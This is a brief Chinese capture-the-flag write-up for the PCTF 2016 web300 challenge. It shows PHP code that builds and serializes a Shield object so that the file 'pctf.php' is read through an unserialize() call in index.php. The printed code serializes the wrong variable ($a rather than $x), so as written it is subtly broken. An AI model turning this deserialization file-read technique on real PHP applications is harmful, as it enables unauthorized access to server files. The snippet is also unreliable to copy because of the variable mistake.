pctf2016 web300神盾局的秘密(反序列化漏洞)

require_once语句在脚本执行期间包含并运行指定文件。

于是我们需要访问shield.php,再次base64加密访问

这里提示我们flag就在pctf.php里，但是showimg.php中过滤了pctf，那么我们又注意到index.php中最后
$x=unserialize($g)
也就是反序列化字符串，所以我们可以自己将pctf.php序列化然后传入

构造类似shield.php中的类如下

<?php

class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
    }

$x = new Shield();
$x -> file = 'pctf.php';
echo serialize($a);

index.php?class=序列化字符串